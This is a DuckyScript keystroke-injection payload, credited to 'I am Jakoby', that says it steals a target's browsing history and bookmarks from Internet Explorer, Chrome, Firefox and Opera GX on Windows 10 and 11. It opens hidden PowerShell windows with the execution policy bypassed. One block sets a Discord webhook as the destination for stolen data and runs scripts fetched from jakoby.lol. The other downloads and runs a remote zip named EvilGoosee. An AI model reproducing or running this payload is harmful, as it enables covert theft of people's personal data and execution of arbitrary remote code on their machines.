REM     Title: Browser-Data

REM     Author: I am Jakoby

REM     Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX.

REM     Target: Windows 10, 11

GUI r
DELAY 500
STRING powershell -windowstyle hidden -w h -ep bypass $dc='https://discord.com/api/webhooks/1098026835234795600/aglpx9-3UA0IOXfeehWeseawcSeLzbXSkiYtB6yEqeRLAmgBm7zm0QPWecxz4fQu7vBX';irm https://jakoby.lol/hgw | iex ;irm jakoby.lol/f0x | iex;irm jakoby.lol/e8v | iex;
DELAY 600
ENTER
DELAY 200

GUI r
DELAY 500
STRING powershell -windowstyle hidden -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://github.com/cubestudioss/gOOSE/blob/main/EvilGoosee1.0.zip?raw=true' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
DELAY 200
ENTER
